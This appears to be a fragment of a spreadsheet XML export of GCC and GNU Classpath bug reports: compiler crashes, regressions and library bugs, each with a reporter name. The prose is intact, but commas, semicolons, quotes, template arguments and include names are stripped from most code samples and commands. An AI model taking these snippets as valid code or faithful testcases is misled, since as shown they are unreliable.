+
+	* decl.c (variable_decl): Don't overwrite typesepc of Cray pointees
+	when matching a component declaration.
+
 2014-08-17  Tobias Burnus  
 	* resolve.c (gfc_resolve_finalizers): Ensure that parents are</t>
  </si>
  <si>
    <t>GCC-37499</t>
  </si>
  <si>
    <t>[4.4 Regression] Scheduling pass 2 time increases by order of magnitude</t>
  </si>
  <si>
    <t>I'm testing gcc on the file all.i.gz in PR26854 configured as
Configured with: ../../mainline/configure --enable-checking=release --with-gmp=/pkgs/gmp-4.2.2/ --with-mpfr=/pkgs/gmp-4.2.2/ --prefix=/pkgs/gcc-mainline --enable-languages=c --enable-gather-detailed-mem-stats
and compiled with
/pkgs/gcc-mainline/bin/gcc -Wall -W -Wno-unused -O1 -fno-math-errno -fschedule-insns2 -fno-trapping-math -fno-strict-aliasing -fwrapv -fomit-frame-pointer -fPIC -ftime-report -fmem-report -c all.i &gt;&gt;&amp; mainline-stats-2008-09-11-b
On July 29 the time for the second scheduling pass was
 scheduling 2          :   2.62 ( 1%) usr   0.04 ( 0%) sys   2.67 ( 1%) wall       0 kB ( 0%) ggc
 TOTAL                 : 175.90            15.47           191.42             802297 kB
with revision 140295 the time for the second scheduling pass was
 scheduling 2          :  32.40 (16%) usr   0.00 ( 0%) sys  32.43 (14%) wall       0 kB ( 0%) ggc
 TOTAL                 : 204.16            15.17           225.52             794201 kB
I'll attach the two detailed memory and cpu time reports.
While the July 29th report did not use IRA I tested the IRA branch on May 19 and got similar results to the mainline in July:
 scheduling 2          :   2.63 ( 1%) usr   0.00 ( 0%) sys   2.63 ( 1%) wall       0 kB ( 0%) ggc</t>
  </si>
  <si>
    <t>amonakov</t>
  </si>
  <si>
    <t>GCC-12058</t>
  </si>
  <si>
    <t>java.lang.reflect.Array.set(Object int Object) throws java.lang.IllegalArgumentException</t>
  </si>
  <si>
    <t>Calling Array.set(array 0 null) causes an java.lang.IllegalArgumentException.
This was tested on win2k using GCC 3.4-20030802 found at
http://www.thisiscool.com/gcc_mingw.htm.
Below is the test class.  Build scripts available if necessary.  This bug is
likely a problem with the java library and most likely exists on all platforms.
 Passing anything but null appears to work fine.  This is likely an easy thing
to fix.  I would like to try fixing it myself but have not yet figured out how
to build GCC/GCJ for windows (tried on Mandrake Cygwin and Mingw).
import java.lang.reflect.*
public class StackTrace {
public StackTrace() {
}
public void throwException() {
	throw new RuntimeException(choke me)
}
public static void main(String[] args) {
	try {
		java.io.File file = new java.io.File(.\\output.txt)
		java.io.StringWriter sw = new java.io.StringWriter()
		java.io.PrintWriter pw = new java.io.PrintWriter(sw)
		java.io.FileOutputStream fout = new java.io.FileOutputStream(file)
		java.io.ObjectOutputStream out = new java.io.ObjectOutputStream(fout)
		try {
			//new StackTrace().throwException()
			Object[] array = new Object[2]
			out.writeObject(setting null\r\n)
			array[0] = null
			out.writeObject(calling Array.set() w/obj\r\n)
			Array.set(array 0 null)
			out.writeObject(success\r\n)
		} catch(Throwable ex) {
			ex.printStackTrace(pw)
			out.writeObject(sw.toString())
		}//catch//
		out.close()
		pw.close()
	}//try//
	catch(Throwable e) {
	}//catch//
}//main()//
}</t>
  </si>
  <si>
    <t>wcrisman</t>
  </si>
  <si>
    <t>GCC-31370</t>
  </si>
  <si>
    <t>resizing bugs in std::vector</t>
  </si>
  <si>
    <t>Pre-4.0 vector had a bunch of nasty error cases when resizing overflowed a size_t. Change 89377 fixed some of them. But
1) vector's copy (yuck) of the relevant functions weren't updated
2) vector's max_size is incorrect. currently it is set to the maximum size_t. but because vector's iterators aren't directly pointers and the iterator arithmetic takes ssize_t as arguments it can't tolerate sizes that don't fit in an ssize_t. because of the round up to the nearest word the correct max_size is SIZE_MAX rounded down to the nearest word.
3) if doubling a vector size exceeds max_size the code will go ahead and ask the allocator for it. It seems nicer to clamp the size to max_size although a bad_alloc is to be expected either way. I'd mostly argue that the vector code should clamp at max_size to avoid relying on the allocator to range check properly.</t>
  </si>
  <si>
    <t>GCC-45771</t>
  </si>
  <si>
    <t>Source operands for conditional moves</t>
  </si>
  <si>
    <t>$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: x86_64-linux-gnu
Configured with: ../configure --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.0 20100923 (experimental) [trunk revision 164569] (GCC) 
#define NULL 0
typedef struct List List
struct List {
    List *next
    int  stuff
}
extern List Ignore
extern List *pending **tail
extern void process(List *)
void
proc_all()
{
    List *irp
    for(  ) {
        irp = pending
        pending = NULL
        if(irp == &amp;Ignore) {
            irp = irp-&gt;next
        }
        if(irp == NULL) break
        pending = irp-&gt;next
        process(irp)
    }
}
-O2 generates
        movq    pending(%rip) %rdi   
        movq    $0 pending(%rip)
        cmpq    $Ignore %rdi
        cmove   (%rdi) %rdi
        testq   %rdi %rdi
Since cmove always references the source operand regardless of the result of the condition and (%idi) can be null which will cause the program to crash.
The pseudo code for cmove:
cmove(condition SRC DEST)
{
       TEMP = SRC
       if (condition)
             DST = TEMP
}</t>
  </si>
  <si>
    <t>GCC-67508</t>
  </si>
  <si>
    <t>[aarch64] gccgo runtime crashes with CONFIG_ARM64_PGTABLE_LEVELS=4 (48bit VMA)</t>
  </si>
  <si>
    <t>As reported at https://bugs.launchpad.net/ubuntu/+source/gccgo-4.9/+bug/1472650 any gccgo-compiled program crashes on startup on an arm64 using 4 level page tables with an error fatal error: runtime_lfstackpush: invalid pointer. There is a fix available at https://go-review.googlesource.com/#/c/13037/</t>
  </si>
  <si>
    <t>michael.hudson</t>
  </si>
  <si>
    <t>GCC-16429</t>
  </si>
  <si>
    <t>regression</t>
  </si>
  <si>
    <t>[4.0 regression] gcc.c-torture/execute/20020412-1.c fails</t>
  </si>
  <si>
    <t>Executing on host: /xxx/gnu/gcc-3.3/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.3/objdir/gc
c/ /xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.c-torture/execute/20020412-1.c  -w  -O
0   -lm   -o /xxx/gnu/gcc-3.3/objdir/gcc/testsuite/20020412-1.x0    (timeout = 3
00)
/xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.c-torture/execute/20020412-1.c: In functi
on `foo':
/xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.c-torture/execute/20020412-1.c:30: intern
al compiler error: in create_tmp_var at gimplify.c:358
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-79409</t>
  </si>
  <si>
    <t>[7 Regression] [graphite] ICE in outermost_loop_in_sese at sese.c:300 w/ -fgraphite-identity -ftree-loop-distribution -O1 (or above)</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20170205 snapshot ICEs when compiling the following snippet w/ -O1 (-O2 -O3 -Ofast) -fgraphite-identity -ftree-loop-distribution:
struct
{
  int bz
} od ka[2]
int fw
void
pc (void)
{
  for (od.bz = 0 od.bz &lt; 2 ++od.bz)
    {
      ++fw
      ka[0] = ka[1]
    }
}
% gcc-7.0.0-alpha20170205 -O1 -fgraphite-identity -ftree-loop-distribution -c ady9pcky.c
ady9pcky.c: In function 'pc':
ady9pcky.c:8:1: internal compiler error: in outermost_loop_in_sese at sese.c:300
 pc (void)
 ^~</t>
  </si>
  <si>
    <t>GCC-9544</t>
  </si>
  <si>
    <t>buggy prolog code generation for functions make room for local vars</t>
  </si>
  <si>
    <t>the prolog code of function when want to make room for local variables is buggy.
void aFunction(void)
{
    char localVars[100]
}
is translated to:
	in	r0SREG
	cli		&lt;----
	preperation code for local variables
	sei		&lt;---- BUG!
the I (interrupt) flag is set at beginning of this function.
Release:
2.95.2 19991024 (release)   AVR version
Environment:
Win2K
How-To-Repeat:
char global[100]
void aFunction(void)
{
   char local[100]
   int  i
   for(i=0 i&lt;100 i++)
      global[i] = local[i]
}</t>
  </si>
  <si>
    <t>reza_agha</t>
  </si>
  <si>
    <t>GCC-51977</t>
  </si>
  <si>
    <t>[OOP] MOVE_ALLOC: Bogus must have the same rank 0/1 for same-rank arrays</t>
  </si>
  <si>
    <t>Split off from PR 51948.
The following fails at move_alloc with a bogus error:
  Error: the 'from' and 'to' arguments of 'move_alloc'  intrinsic at (1)
         must have the same rank 0/1
type t
end type t
contains
  function func(x)
    class(t) allocatable :: x(:) func(:)
    call move_alloc (x func)
  end function
end</t>
  </si>
  <si>
    <t>GCC-4179</t>
  </si>
  <si>
    <t>Re: #pragma warnings are invisible</t>
  </si>
  <si>
    <t xml:space="preserve"> You might take a look at -Wunknown-pragmas.
 I use it for something similar with SCO  Linux.
 &gt; 	Could this be changed to display the content of the pragma
 &gt; 	for instance like this:
 &gt; 
 &gt; 		 pragmawarn.c:1: warning: ignoring #pragma WARNING This is a pragma warning
 &gt; 		 pragmawarn.c:2: warning: ignoring #pragma WARNING(This is a pragma warning ())
 &gt; 		 pragmawarn.c:3:2: warning: #warning This is a GNU C warning
 &gt; 
 &gt; 	This would make GCC much more useful for our purpose.
 &gt; 
 &gt; 	The Compaq C++ handle the warnings like this and it works
 &gt; 	just fine for us. :-)
 -- 
 Gordon Sadler
Release:
unknown</t>
  </si>
  <si>
    <t>gbsadler1</t>
  </si>
  <si>
    <t>GCC-57831</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] pointer to member function inaccessible through using statement (or ICE)</t>
  </si>
  <si>
    <t>g++ 4.8.1 rejects the following code saying B::base::f is inaccessible. 
I believe the code is valid (and compiled without error by Clang).
Moreover when I use the trunk head g++ it crashes with ICE.
----------------------------
struct A {
  void f()
}
template  struct B : T {
  typedef T base
  using base::f         // If I write using B::f it's ok
  void g( ) {
    B::f()           // This is OK as expected
    (this-&gt;*    // This is also OK
    (this-&gt;* // This causes error
  }
}
template struct B
----------------------------
It is strange to see inaccessible error since everything in the code is public.
The oldest g++ in my environment (g++ 4.4) also rejects the code.
Coupiler output for g++ 4.8.1 and g++ trunk are attached below
Possibly related to PR 57658 or PR 53549.
------------------------------
$ g++-4.8 -v
Using built-in specs.
COLLECT_GCC=g++-4.8
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/usr/local --program-suffix=-4.8 --enable-languages=cc++lto
Thread model: posix
gcc version 4.8.1 (GCC)
$ g++-4.8 hoge.ii
hoge.ii: In instantiation of 'void B::g() [with T = A]':
hoge.ii:13:17:   required from here
hoge.ii:6:14: error: 'using B::base::f' is inaccessible
  using base::f
              ^
hoge.ii:10:13: error: within this context
     (this-&gt;*
             ^
hoge.ii:10:10: error: pointer to member type 'B::base' incompatible with object type 'B'
     (this-&gt;*
------------------------------
$ g++-4.9 -v
Using built-in specs.
COLLECT_GCC=g++-4.9
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/usr/local --program-suffix=-4.9 --enable-languages=cc++lto
Thread model: posix
gcc version 4.9.0 20130705 (experimental) (GCC)
$ g++-4.9 hoge.ii
hoge.ii: In instantiation of 'void B::g() [with T = A]':
hoge.ii:13:17:   required from here
hoge.ii:10:13: internal compiler error: in tsubst_copy at cp/pt.c:12616
     (this-&gt;*
             ^
0x59f08b tsubst_copy
        ../../gcc/cp/pt.c:12616
0x5b4bb9 tsubst_qualified_id
        ../../gcc/cp/pt.c:12013
0x58062b tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/cp/pt.c:13684
0x57f906 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/cp/pt.c:13738
0x57e66b tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/cp/pt.c:14013
0x5874f2 tsubst_expr
        ../../gcc/cp/pt.c:13429
0x587a4f tsubst_expr
        ../../gcc/cp/pt.c:12908
0x586f93 tsubst_expr
        ../../gcc/cp/pt.c:12894
0x587d64 tsubst_expr
        ../../gcc/cp/pt.c:13084
0x5858bc instantiate_decl(tree_node* int bool)
        ../../gcc/cp/pt.c:19157
0x5c14ff instantiate_pending_templates(int)
        ../../gcc/cp/pt.c:19256
0x5fd809 cp_write_global_declarations()
        ../../gcc/cp/decl2.c:4063
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
------------------------------</t>
  </si>
  <si>
    <t>t-gcc-bugzilla</t>
  </si>
  <si>
    <t>GCC-12588</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE in function_value</t>
  </si>
  <si>
    <t>Reading specs from /usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.4/specs
Configured with: ../gcc/configure --verbose --enable-languages=c++
Thread model: posix
gcc version 3.4 20031012 (experimental)
 /usr/local/libexec/gcc/alphaev56-unknown-linux-gnu/3.4/cc1plus -E -quiet -v
-MMD PatternData.d -MQ PatternData.o PatternData.cc -mcpu=ev56 -ansi
-pedantic-errors -Werror -Wall -W -Wold-style-cast -Wsign-promo -Wpointer-arith
-Wconversion -Wundef -Wwrite-strings -Winvalid-pch -Woverloaded-virtual
-fno-elide-constructors -fno-common -fstrict-aliasing -fimplicit-templates
-fworking-directory -o PatternData.ii
ignoring nonexistent directory NONE/include
ignoring nonexistent directory
/usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.4/../../../../alphaev56-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.4/../../../../include/c++/3.4
/usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.4/../../../../include/c++/3.4/alphaev56-unknown-linux-gnu
/usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.4/../../../../include/c++/3.4/backward
 /usr/local/include
 /usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.4/include
 /usr/include
End of search list.
 /usr/local/libexec/gcc/alphaev56-unknown-linux-gnu/3.4/cc1plus -fpreprocessed
PatternData.ii -quiet -dumpbase PatternData.cc -mcpu=ev56 -ansi -auxbase-strip
PatternData.o -g -pedantic-errors -Werror -Wall -W -Wold-style-cast -Wsign-promo
-Wpointer-arith -Wconversion -Wundef -Wwrite-strings -Winvalid-pch
-Woverloaded-virtual -ansi -version -fno-elide-constructors -fno-common
-fstrict-aliasing -fimplicit-templates -o PatternData.s
GNU C++ version 3.4 20031012 (experimental) (alphaev56-unknown-linux-gnu)
	compiled by GNU C version 3.4 20031012 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
/usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.4/../../../../include/c++/3.4/bitset:
In member function `size_t std::_Base_bitset::_M_do_count() const [with
long unsigned int _Nw = 4ul]':
/usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.4/../../../../include/c++/3.4/bitset:193:
internal compiler error: in function_value at config/alpha/alpha.c:6048
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>CLASSPATH-19840</t>
  </si>
  <si>
    <t>drawImage bug</t>
  </si>
  <si>
    <t>The attached program demonstrates the (wrong) behaviour of the
'synchronous' variants of java.awt.Graphics.drawImage when
asked to draw to 'negative' offsets. Both Canvas'es should look
the same but current libgcj does shift the image to the bottom right
instead of to the upper left...</t>
  </si>
  <si>
    <t>hendrich</t>
  </si>
  <si>
    <t>GCC-26558</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] segfault on syntax error</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/349087]
g++ (GCC) 4.0.3 20060212 (prerelease) (Debian 4.0.2-9)
falk@gluck:~% cat main.cpp 
template  class C {
        template  int fun() { return NO}
        template  int fun2() {
                return 0 :: //bad code of course here :)
        }
}
falk@gluck:~% g++ -c main.cpp 
main.cpp: In member function 'int C::fun2()':
main.cpp:4: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Does not occur on alpha-linux-gnu or with 3.3.6.</t>
  </si>
  <si>
    <t>GCC-67802</t>
  </si>
  <si>
    <t>ICE on initializing character with wrong len type</t>
  </si>
  <si>
    <t>With a wrong data type for len instead of a scalar-int-expr :
$ cat za2.f90
program p
   character(1.) :: c1 = ' '
   character(1d1) :: c2 = ' '
   character((0.1.)) :: c3 = ' '
   character(.true.) :: c4 = ' '
end
$ gfortran -g -O0 -Wall -fcheck=all -fno-frontend-optimize za2.f90
f951: internal compiler error: Segmentation fault
---
Same issue for these variations :
$ cat za3.f90
program p
   character(1.) parameter :: c1 = ' '
   character(1d1) parameter :: c2 = ' '
   character((0.1.)) parameter :: c3 = ' '
   character(.true.) parameter :: c4 = ' '
end
$ cat zp2.f90
program p
   real parameter :: n1 = 1.
   double precision parameter :: n2 = 1d1
   complex parameter :: n3 = (0.1.)
   logical parameter :: n4 = .true.
   character(n1) :: c1 = ' '
   character(n2) :: c2 = ' '
   character(n3) :: c3 = ' '
   character(n4) :: c4 = ' '
end
$ cat zp3.f90
program p
   real parameter :: n1 = 1.
   double precision parameter :: n2 = 1d1
   complex parameter :: n3 = (0.1.)
   logical parameter :: n4 = .true.
   character(n1) parameter :: c1 = ' '
   character(n2) parameter :: c2 = ' '
   character(n3) parameter :: c3 = ' '
   character(n4) parameter :: c4 = ' '
end</t>
  </si>
  <si>
    <t>GCC-1237</t>
  </si>
  <si>
    <t>File creation doesn't observe umask</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: Bryce McKinlay 
Cc: tromey@cygnus.com java-gnats@sourceware.cygnus.com
Subject: Re: java.io/202: File creation doesn't observe umask
Date: Sat 15 Apr 2000 19:46:03 -0700 (PDT)
 &gt;&gt; Classes that create OS files (i.e. java.io.FileOutputStream)
 &gt;&gt; do not obey the user's current umask.  Files are always
 &gt;&gt; created with permissions -rw-r--r-- regardless of the user's
 &gt;&gt; umask setting.
 Bryce&gt;  umask is being honored but we're creating files with the
 Bryce&gt;  wrong mode (so changing umask from 022 to 000 appears to have
 Bryce&gt;  no effect). The following patch should fix that. OK to commit?
 When I try a simple test program with Sun's JDK (1.1.7 I think) with
 my umask set to 000 it creates a file with mode 0664.  Do you know
 what JDK 1.2 does?  I think it makes sense to be JDK compatible here.
 (When I wrote this code I didn't run a test -- I just picked what I
 thought would be reasonable.)
 Tom
</t>
  </si>
  <si>
    <t>GCC-40882</t>
  </si>
  <si>
    <t>[F03] infinite recursion in gfc_get_derived_type with PPC returning derived type</t>
  </si>
  <si>
    <t>The following test program induces an infinite recursion in gfc_get_derived_type:
implicit none
type :: t
  real :: data
  procedure(foo) pointer nopass :: ppc
end type
type(t) :: oo2
o%ppc =&gt; foo
o2 = o%ppc()
contains
  function foo()
    type(t) :: foo
    foo%data = 5.
    foo%ppc =&gt; NULL()
  end function
end</t>
  </si>
  <si>
    <t>GCC-45520</t>
  </si>
  <si>
    <t>[4.6 Regression] [C++0x] compiler segmentation fault on decltype in lambda-declarator</t>
  </si>
  <si>
    <t>The compiler says: main.cc:7:35: internal compiler error: Segmentation fault
The map must be a class member to reproduce the bug. 
If the decltype is not in a lambda but a method argument a different message appears:
main.cc:6:32: internal compiler error: in tree_low_cst at tree.c:6328
This code compiled correctly with g++ 4.5.0.
File content:
#include 
struct S {
    std::map  Map
    void f() {
        auto lambda=[
    }
}</t>
  </si>
  <si>
    <t>qduaty</t>
  </si>
  <si>
    <t>GCC-758</t>
  </si>
  <si>
    <t>-AQUESTION(ANSWER) seg fault under gcc-2.96 (RedHat 7.0)</t>
  </si>
  <si>
    <t>ksh-2.04$ cc -Ae -E -&lt;/dev/null
cc: Internal error: Segmentation fault (program cpp0)
Please submit a full bug report.
See  for instructions.
ksh-2.04$ gdb /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 core
GNU gdb 5.0
Copyright 2000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386-redhat-linux...(no debugging symbols found)...
Core was generated by `/usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c -Ae -D__GNUC__=2 -D__GNUC_'.
Program terminated with signal 11 Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x8052861 in strcpy () at ../sysdeps/generic/strcpy.c:31
31      ../sysdeps/generic/strcpy.c: No such file or directory.
(gdb) where
#0  0x8052861 in strcpy () at ../sysdeps/generic/strcpy.c:31
#1  0x7 in ?? ()
#2  0x804d610 in strcpy () at ../sysdeps/generic/strcpy.c:31
#3  0x8052ae4 in strcpy () at ../sysdeps/generic/strcpy.c:31
#4  0x804f27d in strcpy () at ../sysdeps/generic/strcpy.c:31
#5  0x80495c5 in strcpy () at ../sysdeps/generic/strcpy.c:31
#6  0x40039b65 in __libc_start_main (main=0x80494b0  argc=22 ubp_av=0xbffff9c4 init=0x8048f84 
    fini=0x805965c  rtld_fini=0x4000df24  stack_end=0xbffff9bc) at ../sysdeps/generic/libc-start.c:111
(gdb)
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Linux 2.2.16-22 #2 i686
UP 128MB RAM.
How-To-Repeat:
cc -Ae -E -&lt;/dev/null</t>
  </si>
  <si>
    <t>sbytnar</t>
  </si>
  <si>
    <t>CLASSPATH-23018</t>
  </si>
  <si>
    <t>JLabel with imageIcon is set incorrectly</t>
  </si>
  <si>
    <t>If a JLabel that has been constructed with a ImageIcon is added to a container with BorderLayout and is set to the the position center its positioned at the left side and not in the center as it should be.
here the sollution how to change this:
change this constructor in JLabel:
public JLabel(Icon image)
  {
    this(null image LEADING)
  }
to this one:
public JLabel(Icon image)
  {
    this(null image CENTER)
  }</t>
  </si>
  <si>
    <t>GCC-6655</t>
  </si>
  <si>
    <t>can not build cross-gcc</t>
  </si>
  <si>
    <t>can not build a cross-gcc with:
configure --target=sparc64-elf --prefix=$PWD/install -v
make all install
Release:
gcc-2.95.3
Environment:
Linux linux02 2.4.10-4GB #1 Tue Sep 25 12:33:54 GMT 2001 i686 unknown</t>
  </si>
  <si>
    <t>aotto</t>
  </si>
  <si>
    <t>GCC-46788</t>
  </si>
  <si>
    <t>unsigned int possible treated as signed in a union/struct</t>
  </si>
  <si>
    <t>Created attachment 22618
a module
When compiling the attached file the compiler does not warn but the assambler gives the following error:
C:\DOKUME~1\tkr\LOKALE~1\Temp\ccqr1SmQ.s: Assembler messages:
C:\DOKUME~1\tkr\LOKALE~1\Temp\ccqr1SmQ.s:522: Error: immediate value out of range -- `movt r3-32768'
The line dwCalcVal.u_16_values.u_16_value_1=0x8000u causes the error.
It looks to me like a singned-unsigned fault and in fact it is so. reducing the constant to a value 0x0000 till 0x7FFF will compile without error.
The problem appears also only when:
- the value is at the stack (local)
- the second value in struct is used (u_16_value_0 works fine).
GCC v 4.3.3 also works fine on the same code.
Configuarion:
-------------
PC Windows XP with Codesourcery Target STM32F103 ARM-Controller
&gt;arm-none-eabi-gcc.exe -v
Using built-in specs.
COLLECT_GCC=arm-none-eabi-gcc.exe
COLLECT_LTO_WRAPPER=c:/temp/codesourcery/bin/../libexec/gcc/arm-none-eabi/4.5.1/lto-wrapper.exe
Target: arm-none-eabi
Configured with: /scratch/julian/2010q3-release-eabi-lite/src/gcc-4.5-2010.09/configure --build=i686-pc-linux-gnu --host=i686-mingw32 --target=arm-none-eabi --enable-threads --disable-libmudflap --disable-libssp --disable-libstdcxx-pch --enable-extra-sgxxlite-multilibs --with-gnu-as --with-gnu-ld --with-specs='%{save-temps: -fverbose-asm} -D__CS_SOURCERYGXX_MAJ__=2010 -D__CS_SOURCERYGXX_MIN__=9 -D__CS_SOURCERYGXX_REV__=51 %{O2:%{!fno-remove-local-statics: -fremove-local-statics}} %{O*:%{O|O0|O1|O2|Os::%{!fno-remove-local-statics: -fremove-local-statics}}}' --enable-languages=cc++ --disable-s
hared --enable-lto --with-newlib --with-pkgversion='Sourcery G++ Lite 2010.09-51' --with-bugurl=https://support.codesourcery.com/GNUToolchain/ --disable-nls --prefix=/opt/codesourcery --with-headers=yes --with-sysroot=/opt/codesourcery/arm-none-eabi --with-build-sysroot=/scratch/julian/2010q3-release-eabi-lite/install/host-i686-mingw32/arm-none-eabi --with-libiconv-prefix=/scratch/julian/2010q3-release-eabi-lite/obj/host-libs-2010.09-51-arm-none-eabi-i686-mingw32/usr --with-gmp=/scratch/julian/2010q3-release-eabi-lite/obj/host-libs-2010.09-51-arm-none-eabi-i686-mingw32/usr --with-mpfr=/scratch/julian/2010q3-release-eabi-lite/obj/host-libs-2010.09-51-arm-none-eabi-i686-mingw32/usr --with-mpc=/scratch/julian/2010q3-release-eabi-lite/obj/host-libs-2010.09-51-arm-none-eabi-i686-mingw32/usr --with-ppl=/scratch/julian/2010q3-release-eabi-lite/obj/host-libs-2010.09-51-arm-none-eabi-i686-mingw32/usr --with-host-libstdcxx='-static-libgcc -Wl-Bstatic-lst dc++-Bdynamic -lm' --with-cloog=/scratch/julian/2010q3-release-eabi-lite/obj/host-libs-2010.09-51-arm-none-eabi-i686-mingw32/usr --with-libelf=/scratch/julian/2010q3-release-eabi-lite/obj/host-libs-2010.09-51-arm-none-eabi-i686-mingw32/usr --disable-libgomp --enable-poison-system-directories --with-build-time-tools=/scratch/julian/2010q3-release-eabi-lite/obj/tools-i686-pc-linux-gnu-2010.09-51-arm-none-eabi-i686-mingw32/arm-none-eabi/bin --with-build-time-tools=/scratch/julian/2010q3-release-eabi-lite/obj/tools-i686-pc-linux-gnu-2010.09-51-arm-none-eabi-i686-mingw32/arm-none-eabi/bin
Thread model: single
gcc version 4.5.1 (Sourcery G++ Lite 2010.09-51)
Call-Parameters:
----------------
COLLECT_GCC_OPTIONS='-c' '-mcpu=cortex-m3' '-mthumb' '-mtune=cortex-m3' '-mfix-cortex-m3-ldrd' '-mlong-calls' '-pedantic' '-mfpu=vfp' '-mfloat-abi=soft' '-nostdinc' '-Os' '-DLITTLE_ENDIAN' '-v' '-gdwarf-2' '-fmessage-length=0' '-mlittle-endian' '-fshort-enums' '-mno-thumb-interwork' '-mstructure-size-boundary=8' '-fno-builtin' '-funsigned-bitfields' '-Wcast-align' '-Wreturn-type' '-Wimplicit' '-Wunused' '-Wswitch' '-Wuninitialized' '-o' 'E:\workspace_tkr\FSD-ELMA\trunk\out/SA1/ALGAac1.o' '-D__CS_SOURCERYGXX_MAJ__=2010' '-D__CS_SOURCERYGXX_MIN__=9' '-D__CS_SOURCERYGXX_REV__=51' e:/toolhome/arm/codesourcery/v_4_5_1/bin/../lib/gcc/arm-none-eabi/4.5.1/../../../../arm-none-eabi/bin/as.exe -v -EL -mcpu=cortex-m3 -mfloat-abi=soft -mfpu=vfp -meabi=5 -alhcdn -o E:\workspace_tkr\FSD-ELMA\trunk\out/SA1/ALGAac1.o C:\DOKUME~1\tkr\LOKALE~1\Temp\ccqr1SmQ.s
GNU assembler version 2.20.51 (arm-none-eabi) using BFD version (Sourcery G++ Lite 2010.09-51) 2.20.51.20100809</t>
  </si>
  <si>
    <t>tinokrauss</t>
  </si>
  <si>
    <t>GCC-26350</t>
  </si>
  <si>
    <t>ICE in extract_insn at recog.c:2084 -fPIC -mlong-double-128</t>
  </si>
  <si>
    <t>We ICE building hercules for powerpc32.  Reduced testcase build with
-O2 -fPIC -mlong-double-128:
  typedef int int32_t __attribute__ ((__mode__ (__SI__)))
  typedef unsigned char uint8_t
  typedef unsigned int uint32_t
  typedef struct REGS REGS
  typedef union { uint32_t F } FW
  typedef union { struct { FW L } F } DW
  typedef struct _PSW {
          DW ia
  } PSW
  struct REGS {
          PSW psw
          DW cr[16]
  }
  struct ebfp {
     long double v
  }
void ( s390_convert_fix32_to_bfp_ext_reg) (REGS *regs)
{
      struct ebfp op1
      int32_t op2
 ((regs))-&gt;psw.ia.F.L.F += (4)
 if(!((regs)-&gt;cr[(0)].F.L.F &amp; 0x00040000))
   op1.v = (long double)op2
 put_ebfp(
}</t>
  </si>
  <si>
    <t>GCC-49640</t>
  </si>
  <si>
    <t>Internal compiler in C99 code (using variable-length arrays) and OpenMP</t>
  </si>
  <si>
    <t>Hello
the attached code fails to compile with gcc 4.5.0 when enabling OpenMP:
[kraused@cub ~]$ gcc -c -std=gnu99 test.c
[kraused@cub ~]$ gcc -c -std=gnu99 -fopenmp test.c
test.c: In function 'convert_u8_f32.omp_fn.0':
test.c:31:9: internal compiler error: in expand_one_var at cfgexpand.c:953
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The gcc version is 4.5.0:
[kraused@cub ~]$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/share/apps/gcc/4.5.0/gcc_412/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/share/apps/gcc/4.5.0/gcc_412 --with-mpfr=/share/apps/mpfr/2.4.2/gcc_412 --with-gmp=/share/apps/gmp/5.0.1/gcc_412 --with-mpc=/share/apps/mpc/0.8.2/gcc_412 --enable-languages=cc++fortran
Thread model: posix
gcc version 4.5.0 (GCC) 
Btw. the code also fails to compile with the 4.1.2 gcc on my RHEL box:
[kraused@icsprec03 ~]$ gcc -c -std=gnu99 -fopenmp convert.c 
convert.c: In function â€˜convert_u8_s32.omp_fn.0â€™:
convert.c:27: internal compiler error: in make_decl_rtl at varasm.c:893
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccsIbyBy.out file please attach this to your bugreport.
[kraused@icsprec03 ~]$ gcc -v
Using built-in specs.
Target: x86_64-redhat-linux
